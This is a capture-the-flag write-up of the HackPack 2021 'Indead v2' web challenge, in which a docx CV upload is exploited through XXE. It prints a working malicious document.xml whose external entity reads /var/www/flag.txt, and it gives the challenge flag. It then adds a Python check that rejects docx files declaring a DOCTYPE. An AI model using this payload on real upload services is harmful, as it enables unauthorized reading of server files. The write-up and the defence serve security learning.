HackPack CTF 2021: Indead v2

Indead v2

Category: web

50 points

Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV. http://indead-upload-cv.ctf2021.hackpack.club

Hint 1: flag.txt is located in /var/www/

Hint 2: We have new job postings. You might be interested

Solution

It’s a continuation of Indead v1.


This time it is possible to view a details page and upload a CV. The form accepts only docx files, and the content of the uploaded document is then shown on the page.


I decided to exploit it with XXE. I created a dummy docx file and, as it is an ordinary zip archive, I extracted it and edited /word/document.xml by adding the payload below:

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>

and &xxe; in the body of the XML.

After the change, the malicious document.xml looks like this:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>
<w:document
    xmlns:o="urn:schemas-microsoft-com:office:office"
    xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    xmlns:v="urn:schemas-microsoft-com:vml"
    xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    xmlns:w10="urn:schemas-microsoft-com:office:word"
    xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
    xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"
    xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup"
    xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
    xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing"
    xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml"
    mc:Ignorable="w14 wp14">
<w:body>
<w:p><w:pPr><w:pStyle w:val="Normal"/><w:bidi w:val="0"/><w:jc w:val="left"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Badum, tssss…. &xxe;</w:t></w:r></w:p>
<w:sectPr><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="1134" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection w:val="lrTb"/></w:sectPr>
</w:body>
</w:document>

I swapped the original document.xml with mine and attempted to upload the prepared docx CV.


Flag

flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}
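
On the receiving side, an upload handler can refuse any docx whose XML parts declare a DOCTYPE, which stops this payload before the document is parsed for display. The check below is an added example, not code from the challenge or from this writeup; the function names and the two sample documents are assumptions constructed for illustration.

```python
import io
import zipfile
from xml.parsers import expat

class DtdFound(Exception):
    """Raised by the handler below to abort parsing."""

def _on_doctype(name, system_id, public_id, has_internal_subset):
    # Abort at the DOCTYPE itself, before any entity is declared or expanded.
    raise DtdFound(name)

def check_part(xml_bytes):
    """Return None if the part is clean, otherwise the reason to reject it."""
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except DtdFound:
        return "declares a DOCTYPE"
    except expat.ExpatError as exc:
        return "not well-formed: %s" % exc
    return None

def scan_docx(docx_bytes):
    """Map each rejected XML part of a docx to the reason it was rejected."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if name.endswith((".xml", ".rels")):
                reason = check_part(archive.read(name))
                if reason:
                    findings[name] = reason
    return findings

def make_docx(document_xml):
    """Build a one-part archive in memory (constructed sample, not a full docx)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("word/document.xml", document_xml)
    return buf.getvalue()

# Constructed samples: a clean part and one carrying the DTD shown in the writeup.
CLEAN = '<?xml version="1.0"?><doc><t>Hello</t></doc>'
WITH_DTD = ('<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM '
            '"file:///var/www/flag.txt" >]><doc><t>&xxe;</t></doc>')

if __name__ == "__main__":
    print(scan_docx(make_docx(CLEAN)))
    print(scan_docx(make_docx(WITH_DTD)))
```

Word-processing documents have no legitimate need for a DTD, so rejecting on the declaration alone does not break ordinary uploads.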

luc © 2021